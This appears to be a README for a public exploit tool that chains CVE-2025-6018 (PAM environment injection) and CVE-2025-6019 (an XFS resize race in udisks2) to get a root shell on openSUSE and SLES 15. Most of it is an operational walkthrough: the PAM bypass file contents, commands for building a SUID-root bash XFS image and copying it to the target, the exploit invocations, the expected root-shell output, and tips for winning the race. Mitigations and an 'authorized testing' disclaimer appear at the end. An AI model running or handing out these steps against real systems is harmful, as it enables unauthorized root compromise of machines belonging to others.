Share
## https://sploitus.com/exploit?id=8F191692-6CEE-5085-A4BA-7604138C9672
# CVE-2025-6018 + CVE-2025-6019 Exploit

## Local Privilege Escalation in openSUSE/SUSE Linux Enterprise 15

A combined exploit for two vulnerabilities that together allow an unprivileged user to escalate to root on openSUSE Leap 15.x and SUSE Linux Enterprise 15.x systems.

![License](https://img.shields.io/badge/license-MIT-blue.svg)
![Platform](https://img.shields.io/badge/platform-Linux-lightgrey.svg)
![CVE](https://img.shields.io/badge/CVE-2025--6018-red.svg)
![CVE](https://img.shields.io/badge/CVE-2025--6019-red.svg)

## Overview

| CVE | Description | Impact |
|-----|-------------|--------|
| **CVE-2025-6018** | PAM Environment Variable Injection | Bypass to `allow_active` status |
| **CVE-2025-6019** | udisks2/libblockdev XFS Resize Race Condition | Local Privilege Escalation to root |

### Attack Chain

```
Unprivileged User โ†’ CVE-2025-6018 โ†’ allow_active User โ†’ CVE-2025-6019 โ†’ ROOT
```

## Affected Systems

- openSUSE Leap 15.x
- SUSE Linux Enterprise Server 15.x
- SUSE Linux Enterprise Desktop 15.x
- Other distributions with vulnerable PAM and udisks2 configurations

### Vulnerable Components

- **PAM** (Linux-PAM 1.3.0 - 1.6.0) with `user_readenv=1` (default on SUSE)
- **udisks2** 2.9.x with libblockdev XFS support
- **polkit** with `allow_active: yes` for udisks2 actions

## How It Works

### CVE-2025-6018: PAM Environment Injection

When a user logs in via SSH on vulnerable systems:

1. PAM's `pam_env` module reads `~/.pam_environment` by default
2. The `pam_systemd` module uses these environment variables
3. By setting `XDG_SEAT=seat0` and `XDG_VTNR=1`, an attacker tricks the system into thinking they're a physical console user
4. This grants `allow_active` privileges in polkit

### CVE-2025-6019: XFS Resize Race Condition

With `allow_active` status:

1. Attacker creates an XFS image containing a SUID root binary
2. Sets up a loop device pointing to this image
3. Triggers a filesystem resize via udisks2/gdbus
4. During resize, libblockdev temporarily mounts the XFS filesystem **without** `nosuid` flag
5. Attacker races to execute the SUID binary during this window
6. **ROOT SHELL OBTAINED**

## Usage

### Quick Start

```bash
# 1. On TARGET: Check if vulnerable
./exploit.sh --check

# 2. On TARGET: Setup PAM bypass
./exploit.sh --setup

# 3. RECONNECT via SSH, then: su - username

# 4. On TARGET: Exploit with XFS image
./exploit.sh --exploit /tmp/xfs.img
```

### Command Reference

| Option | Description |
|--------|-------------|
| `-c, --check` | Check if system is vulnerable |
| `-s, --setup` | Setup PAM environment for CVE-2025-6018 |
| `-e, --exploit ` | Exploit CVE-2025-6019 with XFS image |
| `-a, --auto ` | Full auto exploitation (setup + exploit) |
| `-C, --create-image` | Show instructions to create XFS image |
| `-h, --help` | Show help message |

### Creating the XFS Image (ATTACKER Machine)

**CRITICAL: This must be done as root on your attacker machine!**

```bash
# 1. Get victim's bash binary
scp user@target:/usr/bin/bash /tmp/bash

# 2. Create XFS image
dd if=/dev/zero of=xfs.img bs=1M count=300
mkfs.xfs xfs.img

# 3. Mount with SUID support
mkdir -p /tmp/mnt
mount -o loop,suid xfs.img /tmp/mnt

# 4. Copy bash and set SUID bit
cp /tmp/bash /tmp/mnt/xpl
chmod 4755 /tmp/mnt/xpl
chown root:root /tmp/mnt/xpl

# 5. VERIFY - Must show -rwsr-xr-x (note the 's')
ls -la /tmp/mnt/xpl
# Expected: -rwsr-xr-x 1 root root ... xpl

# 6. Unmount and transfer
umount /tmp/mnt
scp xfs.img user@target:/tmp/
```

## Full Exploitation Walkthrough

### Step 1: Initial Access

SSH into the target as an unprivileged user:

```bash
ssh user@target
```

### Step 2: Check Vulnerability

```bash
./exploit.sh --check
```

Expected output:
```
[+] pam_env.so found in PAM configuration
[+] pam_systemd.so found - escalation vector available
[+] Target OS is vulnerable (openSUSE/SLES)
[-] allow_active status: NO
```

### Step 3: Setup PAM Bypass

```bash
./exploit.sh --setup
```

This creates `~/.pam_environment` with:
```
XDG_SEAT=seat0
XDG_VTNR=1
```

### Step 4: Reconnect to Trigger PAM

```bash
# Exit current session
exit

# SSH back in
ssh user@target

# IMPORTANT: Switch user to trigger full PAM processing
su - $USER
# Enter your password
```

### Step 5: Verify allow_active Status

```bash
./exploit.sh --check
```

Expected output:
```
[+] allow_active status: YES
    You have allow_active privileges!
```

### Step 6: Transfer XFS Image

On attacker machine:
```bash
scp xfs.img user@target:/tmp/
```

### Step 7: Exploit

```bash
./exploit.sh --exploit /tmp/xfs.img
```

Expected output:
```
[+] Image found: /tmp/xfs.img
[+] Verified XFS filesystem
[+] allow_active status: YES
[+] Loop device created: /dev/loop0
[+] Loop device verified as XFS
[*] Starting race condition loop...
[*] Triggering XFS resize on loop0...

=== ROOT SHELL OBTAINED ===
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)

root@target#
```

## Troubleshooting

### "allow_active status: NO"

1. Ensure `~/.pam_environment` exists with correct content
2. Exit SSH completely and reconnect
3. Run `su - $USER` after SSH login
4. Verify with: `loginctl show-session $(loginctl | grep $USER | awk '{print $1}') -p Seat -p Active`

### "Image is not XFS format"

The image must be created with `mkfs.xfs`, not `mkfs.ext4`.

### "SUID binary not working"

1. Verify on attacker machine: `ls -la /tmp/mnt/xpl` shows `-rwsr-xr-x`
2. The `s` in permissions is CRITICAL
3. File must be owned by root
4. Architecture must match (x86_64 โ†’ x86_64)

### "Race condition missed"

Run the exploit again. The race window is small but usually succeeds within 1-3 attempts.

## Technical Details

### PAM Configuration (CVE-2025-6018)

Vulnerable PAM configuration in `/etc/pam.d/common-auth`:
```
auth    required    pam_env.so    user_readenv=1
```

The `user_readenv=1` option (default on SUSE) allows users to inject environment variables.

### Polkit Policy (CVE-2025-6019)

From `/usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy`:
```xml

    yes

```

### Race Condition Window

During XFS resize, libblockdev:
1. Mounts filesystem to `/tmp/blockdev.XXXXXX`
2. Runs `xfs_growfs`
3. Unmounts filesystem

The temporary mount at step 1 lacks `nosuid` flag, creating the exploitation window.

## Mitigation

### Immediate Mitigations

1. **Disable user_readenv in PAM**:
   ```bash
   # Edit /etc/pam.d/common-auth
   # Change: auth required pam_env.so user_readenv=1
   # To:     auth required pam_env.so user_readenv=0
   ```

2. **Restrict udisks2 polkit policy**:
   ```xml
   
   auth_admin
   ```

### Vendor Patches

- Check for security updates from SUSE
- Update PAM, udisks2, and libblockdev packages

## References

- [Qualys Security Advisory](https://www.qualys.com/2025/06/17/cve-2025-6018-6019/)
- [SUSE Security Announcement](https://www.suse.com/security/cve/CVE-2025-6018.html)
- [Original Research by Qualys](https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt)
- [NVD - CVE-2025-6018](https://nvd.nist.gov/vuln/detail/CVE-2025-6018)
- [NVD - CVE-2025-6019](https://nvd.nist.gov/vuln/detail/CVE-2025-6019)

## Credits

- **Qualys Threat Research Unit** - Original vulnerability discovery
- **DesertDemons** - Exploit development and testing

## Disclaimer

This tool is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. The author is not responsible for any misuse of this tool.

## License

MIT License - See [LICENSE](LICENSE) file for details.